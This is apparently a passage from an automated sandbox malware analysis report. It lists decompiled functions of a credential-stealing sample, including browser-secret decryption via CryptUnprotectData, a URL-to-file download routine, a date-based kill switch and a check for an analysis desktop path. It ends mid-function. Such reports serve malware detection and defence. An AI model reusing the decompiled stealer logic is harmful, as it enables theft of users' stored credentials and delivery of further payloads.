Instruction Fuzzy Hash: 0CB15232D00218EBCB10BFA5DC46ACDB775EF45308F05547BF502B7262CA79AE858B98

Uniqueness

Uniqueness Score: -1.00%

Function 00409B07 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,0040D436), ref: 00409B1C
ExitProcess.KERNEL32 ref: 00409B27
strtok_s.MSVCRT ref: 00409B38

Strings

block, xrefs: 00409B10

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: c6aa10b474e13b4c592d30f34606815b9de056688f30b14ffcaa006a112a85c2
Instruction ID: 5a1c0fee11dd19611366e533cd8b2f6d04aad52a10ce4c8f0cfd848f05e7ce9e
Opcode Fuzzy Hash: c6aa10b474e13b4c592d30f34606815b9de056688f30b14ffcaa006a112a85c2
Instruction Fuzzy Hash: FF31A270E08200EBEF249F61DD48B977BBCEB45309F10546BE806EA1D2E378D985DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040B981 Relevance: 18.2, APIs: 12, Instructions: 175
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040B981(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				char* _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v40;
				void _v308;
				void _v572;
				char _v1572;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t68;
				void* _t82;
				void* _t99;
				void* _t101;
				void* _t103;
				char* _t104;
				char* _t106;
				intOrPtr* _t113;
				void* _t131;
				void* _t138;
				void* _t165;
				void* _t166;
				void* _t169;
				void* _t170;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t178;
				void* _t179;

				_t179 = __eflags;
				memset( &_v572, 0, 0x104);
				memset( &_v308, 0, 0x104);
				_v12 = 0;
				_v16 = 0;
				_t68 = E0040EFE3( &_v40, 0x1a);
				_pop(_t131);
				 *0x61575c( &_v572,  *_t68);
				E00401859(_v40);
				 *0x61575c( &_v572,  *0x615258);
				 *0x61575c( &_v308,  &_v572);
				 *0x61575c( *0x6154f4);
				_t169 = _t166 + 0x18 - 0xc;
				E004100ED(_t169, _t179,  &_v308);
				_t82 = E0040EFB9( &_v308);
				_t170 = _t169 + 0xc;
				_t180 = _t82;
				if(_t82 != 0) {
					_t174 = _t170 - 0xc;
					E004100ED(_t174, _t180, 0x411be1);
					_t175 = _t174 - 0x50;
					E004016EB( &_a12, _t175);
					_push( &_v16);
					_push( &_v12);
					_push( &_v308);
					_t99 = E0040551E(_t180);
					_t170 = _t175 + 0x68;
					_t181 = _t99;
					if(_t99 != 0) {
						_t176 = _t170 - 0xc;
						E004100ED(_t176, _t181, _a4);
						_t101 = E00405394( &_v24,  &_v28);
						_t170 = _t176 + 0xc;
						if(_t101 != 0) {
							_t103 = E0040F38D(_v28, _t131, _v24);
							_pop(_t138);
							_t165 = _t103;
							_t104 = StrStrA(_t165,  *0x615040);
							_v8 = _t104;
							if(_t104 != 0) {
								_t106 =  &(_t104[0xc]);
								_v8 = _t106;
								_t106[0x8c] = 0;
								if(E00405430( &_v20, _t138,  &_v24, _v8) != 0) {
									_v28 =  &_v1572;
									memset(_v28, 0, 0x3e8 << 0);
									_t113 = E0040566F(_v24,  &_v40, _v20, _v12, _v16);
									_t178 = _t170 + 0x1c;
									 *0x61575c( &_v1572,  *_t113);
									E00401859(_v40);
									_push(0x411be1);
									_push( &_v1572);
									if( *0x615784() != 0) {
										_push( &_v1572);
									} else {
										_push(_v8);
									}
									 *0x61575c(_a8);
									 *0x61575c(_a8, "\n");
									_v20 =  &_v1572;
									memset(_v20, 0, 0x3e8 << 0);
									_t170 = _t178 + 0xc;
								}
							}
							GlobalFree(_t165);
						}
					}
				}
				E00405489( &_v16,  &_v12);
				_v20 =  &_v572;
				memset(_v20, 0, 0x104 << 0);
				_v20 =  &_v308;
				memset(_v20, 0, 0x104 << 0);
				_v20 =  &_v8;
				memset(_v20, 0, 4 << 0);
				return E004016CC( &_a12);
			}

0x0040b981
0x0040b9a3
0x0040b9b1
0x0040b9bb
0x0040b9be
0x0040b9c1
0x0040b9c6
0x0040b9d0
0x0040b9d9
0x0040b9eb
0x0040b9ff
0x0040ba12
0x0040ba18
0x0040ba24
0x0040ba29
0x0040ba2e
0x0040ba31
0x0040ba33
0x0040ba39
0x0040ba43
0x0040ba48
0x0040ba50
0x0040ba58
0x0040ba5c
0x0040ba63
0x0040ba64
0x0040ba69
0x0040ba6c
0x0040ba6e
0x0040ba74
0x0040ba7c
0x0040ba87
0x0040ba8c
0x0040ba91
0x0040ba9d
0x0040baa2
0x0040baa9
0x0040baac
0x0040bab2
0x0040bab7
0x0040babd
0x0040bac0
0x0040bac3
0x0040badb
0x0040bae7
0x0040baf4
0x0040bb06
0x0040bb0b
0x0040bb17
0x0040bb20
0x0040bb25
0x0040bb30
0x0040bb39
0x0040bb46
0x0040bb3b
0x0040bb3b
0x0040bb3b
0x0040bb4a
0x0040bb58
0x0040bb64
0x0040bb71
0x0040bb71
0x0040bb71
0x0040badb
0x0040bb74
0x0040bb74
0x0040ba91
0x0040ba6e
0x0040bb80
0x0040bb8b
0x0040bb98
0x0040bba0
0x0040bbad
0x0040bbb2
0x0040bbbf
0x0040bbcd

APIs

memset.MSVCRT ref: 0040B9A3
memset.MSVCRT ref: 0040B9B1

Part of subcall function 0040EFE3: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

lstrcat.KERNEL32(?,00000000), ref: 0040B9D0
lstrcat.KERNEL32(?), ref: 0040B9EB
lstrcat.KERNEL32(?,?), ref: 0040B9FF
lstrcat.KERNEL32(?), ref: 0040BA12

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 0040EFB9: GetFileAttributesA.KERNEL32(?,?,?,004092CC,?,?,?), ref: 0040EFC0

Part of subcall function 0040551E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?), ref: 00405569
Part of subcall function 0040551E: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?), ref: 00405594
Part of subcall function 0040551E: memcmp.MSVCRT ref: 004055D4
Part of subcall function 0040551E: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004055FF
Part of subcall function 0040551E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?), ref: 00405615
Part of subcall function 0040551E: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00405630

Part of subcall function 00405394: CreateFileA.KERNEL32(cd@,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053AF
Part of subcall function 00405394: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00406463,?,?,?,?), ref: 004053C6
Part of subcall function 00405394: LocalAlloc.KERNEL32(00000040,?,?,?,?,00406463,?,?,?,?), ref: 004053DD
Part of subcall function 00405394: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00406463,?,?,?,?), ref: 004053F4
Part of subcall function 00405394: FindCloseChangeNotification.KERNEL32(?,?,?,?,00406463,?,?,?,?), ref: 0040541C

Part of subcall function 0040F38D: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,?,0040BAA2,?), ref: 0040F399

StrStrA.SHLWAPI(00000000), ref: 0040BAAC
GlobalFree.KERNEL32(00000000), ref: 0040BB74

Part of subcall function 00405430: CryptStringToBinaryA.CRYPT32(7>@,00000000,00000001,00000000,?,00000000,00000000), ref: 00405448
Part of subcall function 00405430: LocalAlloc.KERNEL32(00000040,?,?,?,00403E37,?), ref: 00405456
Part of subcall function 00405430: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040546C
Part of subcall function 00405430: LocalFree.KERNEL32(?,?,?,00403E37,?), ref: 0040547B

Part of subcall function 0040566F: memcmp.MSVCRT ref: 0040568D
Part of subcall function 0040566F: memset.MSVCRT ref: 004056BF
Part of subcall function 0040566F: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 004056F5

lstrcat.KERNEL32(?,00000000), ref: 0040BB17
StrCmpCA.SHLWAPI(?,00411BE1), ref: 0040BB31
lstrcat.KERNEL32(0040BCA5,?), ref: 0040BB4A
lstrcat.KERNEL32(0040BCA5,00414044), ref: 0040BB58

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Locallstrcat$Alloc$File$CryptFreememset$BinaryGlobalStringmemcmp$AttributesChangeCloseCreateDataFindFolderNotificationPathReadSizeUnprotectlstrcpy
String ID:
API String ID: 4011891297-0
Opcode ID: afcbd61a7379dc221fdca8dd0eb10cc67472fd96f0226cde83812337894986a7
Instruction ID: aa742102a420572b813f2d345a51b6ad703af6218634bc56da85b96e68c242fc
Opcode Fuzzy Hash: afcbd61a7379dc221fdca8dd0eb10cc67472fd96f0226cde83812337894986a7
Instruction Fuzzy Hash: EA611C71D0021DEBCF00EBA5DC45ADEBBB9EB48304F1445B6E905B32A1EB35AB548F94

Uniqueness

Uniqueness Score: -1.00%

Function 00404AEE Relevance: 13.6, APIs: 9, Instructions: 102
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404AEE(void* __ecx, void* __eflags, char* _a4, CHAR* _a16) {
				long _v8;
				long _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v80;
				void _v84;
				char _v144;
				void _v1168;
				void* __esi;
				void* _t32;
				void* _t34;
				signed int _t39;
				int _t56;
				void* _t58;
				signed int _t60;
				void* _t73;

				E0041011F( &_a4, __ecx, _t73 - 0xc, __eflags);
				_push( &_v144);
				_t32 = E00403907();
				_t60 = 0xf;
				memcpy( &_v84, _t32, _t60 << 2);
				_t34 = InternetOpenA(0x411be1, 1, 0, 0, 0);
				_v16 = _t34;
				if(_t34 != 0) {
					_t39 =  *0x615784(_v80,  *0x6153c0);
					asm("sbb eax, eax");
					_t58 = InternetOpenUrlA(_v16, _a4, 0, 0, ( ~_t39 & 0xff800000) + 0x800100, 0);
					_v20 = CreateFileA(_a16, 0x40000000, 3, 0, 2, 0x80, 0);
					while(InternetReadFile(_t58,  &_v1168, 0x400,  &_v8) != 0) {
						__eflags = _v8;
						if(_v8 <= 0) {
							L5:
							__eflags = _v8 - 0x400;
							if(_v8 >= 0x400) {
								continue;
							}
						} else {
							_t56 = WriteFile(_v20,  &_v1168, _v8,  &_v12, 0);
							__eflags = _t56;
							if(_t56 != 0) {
								__eflags = _v8 - _v12;
								if(_v8 == _v12) {
									goto L5;
								}
							}
						}
						break;
					}
					_v24 =  &_v1168;
					memset(_v24, 0, 0x400 << 0);
					CloseHandle(_v20);
					InternetCloseHandle(_t58);
					InternetCloseHandle(_v16);
				}
				E00401859(_a4);
				return E00401859(_a16);
			}

0x00404b02
0x00404b0d
0x00404b0e
0x00404b18
0x00404b1e
0x00404b2c
0x00404b32
0x00404b37
0x00404b46
0x00404b4e
0x00404b7d
0x00404b85
0x00404bbd
0x00404b8f
0x00404b92
0x00404bb8
0x00404bb8
0x00404bbb
0x00000000
0x00000000
0x00404b94
0x00404ba6
0x00404bac
0x00404bae
0x00404bb3
0x00404bb6
0x00000000
0x00000000
0x00404bb6
0x00404bae
0x00000000
0x00404b92
0x00404bda
0x00404be7
0x00404bec
0x00404bf3
0x00404bfc
0x00404bfc
0x00404c05
0x00404c16

APIs

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Part of subcall function 00403907: malloc.MSVCRT ref: 00403939
Part of subcall function 00403907: malloc.MSVCRT ref: 0040393F
Part of subcall function 00403907: malloc.MSVCRT ref: 00403945
Part of subcall function 00403907: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00403957
Part of subcall function 00403907: InternetCrackUrlA.WININET(000000FF,00000000), ref: 0040395F

InternetOpenA.WININET(00411BE1,00000001,00000000,00000000,00000000), ref: 00404B2C
StrCmpCA.SHLWAPI(?), ref: 00404B46
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00404B64
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404B7F
WriteFile.KERNEL32(?,?,0040AD35,?,00000000), ref: 00404BA6
InternetReadFile.WININET(00000000,?,00000400,0040AD35), ref: 00404BCA
CloseHandle.KERNEL32(?), ref: 00404BEC
InternetCloseHandle.WININET(00000000), ref: 00404BF3
InternetCloseHandle.WININET(?), ref: 00404BFC

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Internet$CloseFileHandlemalloc$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2686625783-0
Opcode ID: f6d09e225e5762d8506a312b433c2351d2dbe0e3bfd2d04c8fb6247801d4c499
Instruction ID: 9cefee5f18a430381f62ea2e84a6b589471199244335059516875d8e0b358419
Opcode Fuzzy Hash: f6d09e225e5762d8506a312b433c2351d2dbe0e3bfd2d04c8fb6247801d4c499
Instruction Fuzzy Hash: 973170B1901118EBDF20ABA1DC49FDEBBB9EF44350F548066FA05F21A0E7749A44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2E0 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040F2E0(char* __eax, char* _a4, intOrPtr _a8) {
				char* _t12;
				void* _t13;
				void* _t15;
				CHAR* _t16;
				CHAR* _t18;

				_t18 = __eax;
				_t12 = StrStrA(__eax, _a4);
				if(_t12 != 0) {
					_t15 = _t12 - _t18;
					_t18 = "C:\\Users\\alfons\\Desktop\\";
					 *0x6156f0(_t18, _t18, _t15, _t13);
					_t3 = _t15 + "C:\\Users\\alfons\\Desktop\\"; // 0x555c3a43
					_t16 = _t3;
					 *_t16 = 0;
					wsprintfA(_t16, "%s%s", _a8,  *0x61567c(_a4) + _t12);
				}
				return _t18;
			}

0x0040f2e8
0x0040f2f1
0x0040f2f5
0x0040f2fa
0x0040f2fe
0x0040f304
0x0040f30d
0x0040f30d
0x0040f313
0x0040f328
0x0040f331
0x0040f337

APIs

StrStrA.SHLWAPI(?,00000010,?,?,?,00409923,00000000,00000010), ref: 0040F2EB
lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,?,?,?,?,00409923,00000000,00000010), ref: 0040F304
lstrlen.KERNEL32(00000010,?,?,?,00409923,00000000,00000010), ref: 0040F316
wsprintfA.USER32 ref: 0040F328

Strings

%s%s, xrefs: 0040F322
C:\Users\user\Desktop\, xrefs: 0040F2FE, 0040F303

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-438050915
Opcode ID: 9af4de0fb87b4491cf5ff891773722fd8899f79aa19efbe13f6b2705158b406b
Instruction ID: e57e852e4fe6118b413980f762cb570280d5e4a697db4828236ecac59e0e0ab0
Opcode Fuzzy Hash: 9af4de0fb87b4491cf5ff891773722fd8899f79aa19efbe13f6b2705158b406b
Instruction Fuzzy Hash: 14F0BE32200616FFD7010B69DC489EAFF6EEFC53B4B484033F90A92220C671881586E9

Uniqueness

Uniqueness Score: -1.00%

Function 00409568 Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00409587
StrCmpCA.SHLWAPI(00000000,00414070,?,?,?,?,?,0040D4AC), ref: 004095B9
strtok_s.MSVCRT ref: 00409651

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: cf8dba1d9efaf7c24a7449741fd8ea0715a566fe2f33e2ea4495f8bcbdced5b2
Instruction ID: f003a4588aed5173fb395cbf763eca3bff61983121e966c7422dab3a1f5e8114
Opcode Fuzzy Hash: cf8dba1d9efaf7c24a7449741fd8ea0715a566fe2f33e2ea4495f8bcbdced5b2
Instruction Fuzzy Hash: B831A871E04105EFCB25DF64C845BAA77A8FB08309F20543BE906FA1D2D779DE518B89

Uniqueness

Uniqueness Score: -1.00%

Function 0040566F Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040566F(signed int __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v20;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void _v84;
				void* __esi;
				intOrPtr _t39;
				void* _t44;
				int _t57;
				void* _t58;
				signed int _t60;
				intOrPtr _t61;
				long _t62;

				_t60 = __eax;
				if(__eax < 3) {
					L6:
					_push(0x411be1);
					goto L7;
				} else {
					_t1 =  &_a8; // 0x406a63
					__imp__memcmp( *_t1, "v10", 3);
					if(__eax != 0 || ((0 | _a16 != 0x00000000) & (__eax & 0xffffff00 | _a12 != 0x00000000)) == 0) {
						goto L6;
					} else {
						_t57 = 0x40;
						memset( &_v84, 0, _t57);
						_t39 = _a8 + 3;
						_v76 = _t39;
						_t62 = _t60 + 0xffffffe1;
						_v84 = _t57;
						_v80 = 1;
						_v72 = 0xc;
						_v60 = _t39 + _t60 - 0x13;
						_v56 = 0x10;
						_t58 = LocalAlloc(_t57, _t62);
						if(_t58 == 0) {
							goto L6;
						} else {
							_t56 = _v72 + _v76;
							_v8 = 0;
							_t44 =  *0x615794(_a16, _v72 + _v76, _t62,  &_v84, 0, 0, _t58, _t62,  &_v8, 0);
							_push(0x411be1);
							_t73 = _t44;
							if(_t44 < 0) {
								L7:
								_t61 = _a4;
								E004100ED(_t61, __eflags);
							} else {
								E004100ED( &_v20, _t73);
								E00410148(_t56,  &_v20, _t58);
								 *((char*)(_v20 + _v8)) = 0;
								_t61 = _a4;
								E0041011F( &_v20, _t56, _t61, _t73);
								E00401859(_v20);
							}
						}
					}
				}
				return _t61;
			}

0x00405677
0x0040567d
0x00405755
0x00405755
0x00000000
0x00405683
0x0040568a
0x0040568d
0x00405698
0x00000000
0x004056b6
0x004056b8
0x004056bf
0x004056c8
0x004056cb
0x004056d5
0x004056da
0x004056dd
0x004056e4
0x004056eb
0x004056ee
0x004056fb
0x004056ff
0x00000000
0x00405701
0x00405704
0x00405719
0x0040571c
0x00405722
0x00405727
0x00405729
0x0040575a
0x0040575a
0x0040575d
0x0040572b
0x0040572e
0x00405734
0x0040573f
0x00405744
0x00405747
0x0040574e
0x0040574e
0x00405729
0x004056ff
0x00405698
0x00405768

APIs

memcmp.MSVCRT ref: 0040568D
memset.MSVCRT ref: 004056BF
LocalAlloc.KERNEL32(00000040,-000000E1), ref: 004056F5

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Part of subcall function 00410148: lstrlen.KERNEL32(?,?,0040D27A,00411BE1,00411BE1,76636410,1852,00411C74,?,0040E6D0), ref: 0041014E
Part of subcall function 00410148: lstrcpy.KERNEL32(00000000,00000000), ref: 00410180

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Strings

cj@, xrefs: 0040568A
v10, xrefs: 00405685

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: cj@$v10
API String ID: 1400469952-1225189094
Opcode ID: b84d3588365dff74e7b52110b79e4dfbf36cf9edddd2555f127891bd4ba9dbea
Instruction ID: 920dc23f222050c51f10e27b5e485230df348cf858cffad3d15ce3c7e6948f84
Opcode Fuzzy Hash: b84d3588365dff74e7b52110b79e4dfbf36cf9edddd2555f127891bd4ba9dbea
Instruction Fuzzy Hash: C6217F72A00118EBDB10AFA9DC85ADFBB78EF44354F14403AF901B7290E7B4AD409B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9B7 Relevance: 7.6, APIs: 5, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040D9B7() {
				void* _v18;
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				char _v48;
				struct _FILETIME _v60;
				struct _FILETIME _v68;
				void* __edi;
				long _t39;
				void* _t54;

				_v20.wYear = 0;
				_v68.dwLowDateTime = _v68.dwLowDateTime & 0x00000000;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v36.wYear = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v60.dwLowDateTime = _v60.dwLowDateTime & 0;
				asm("stosd");
				asm("stosd");
				GetSystemTime( &_v20);
				sscanf( *(E0040D8E8( &_v48)),  *0x615348,  &(_v36.wDay),  &(_v36.wMonth),  &_v36);
				E00401859(_v48);
				SystemTimeToFileTime( &_v20,  &_v68);
				SystemTimeToFileTime( &_v36,  &_v60);
				_t39 = _v68.dwHighDateTime;
				_t54 = _t39 - _v60.dwHighDateTime;
				if(_t54 >= 0) {
					if(_t54 > 0) {
						L3:
						ExitProcess(0);
					}
					_t39 = _v68.dwLowDateTime;
					if(_t39 > _v60.dwLowDateTime) {
						goto L3;
					}
				}
				return _t39;
			}

0x0040d9c3
0x0040d9c8
0x0040d9d1
0x0040d9d2
0x0040d9d3
0x0040d9d4
0x0040d9d8
0x0040d9e1
0x0040d9e2
0x0040d9e3
0x0040d9e4
0x0040d9e8
0x0040d9f0
0x0040d9f5
0x0040d9fb
0x0040da21
0x0040da2e
0x0040da3d
0x0040da4d
0x0040da53
0x0040da57
0x0040da5b
0x0040da5d
0x0040da69
0x0040da6b
0x0040da6b
0x0040da5f
0x0040da67
0x00000000
0x00000000
0x0040da67
0x0040da75

APIs

GetSystemTime.KERNEL32(?), ref: 0040D9FB
sscanf.NTDLL ref: 0040DA21
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DA3D
SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DA4D
ExitProcess.KERNEL32 ref: 0040DA6B

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 257e18238036a83535fbc8ad15f60a659cafeda24a8f31513f6c8bfc62c8327f
Instruction ID: f2d0572ab9bd8fa40dcf10986fd70308988d20b14d7b53dfbe4767798dc1e0f2
Opcode Fuzzy Hash: 257e18238036a83535fbc8ad15f60a659cafeda24a8f31513f6c8bfc62c8327f
Instruction Fuzzy Hash: 32211872518701FFD341EBA8C84599FF7E9EB88314F409D2AF696E2160E734E6088B57

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA0D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040EA0D() {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v1020;
				intOrPtr* _t29;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr* _t41;

				_push( &_v8);
				_t41 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				_push(0);
				while(1) {
					_push(0xffff);
					if( *0x6155ec() != 0) {
						break;
					}
					if(GetLastError() != 0x7a) {
						if(_t41 != 0) {
							E0040EE19(_t41);
						}
						L15:
						return "0";
					}
					if(_t41 != 0) {
						E0040EE19(_t41);
					}
					_t41 = E0040EE36(_v8);
					if(_t41 == 0) {
						goto L15;
					} else {
						_push( &_v8);
						_push(_t41);
						continue;
					}
				}
				_t40 = _v8;
				_t29 = _t41;
				if(_t40 <= 0) {
					L11:
					E0040EE19(_t41);
					if(_v12 == 0) {
						goto L15;
					}
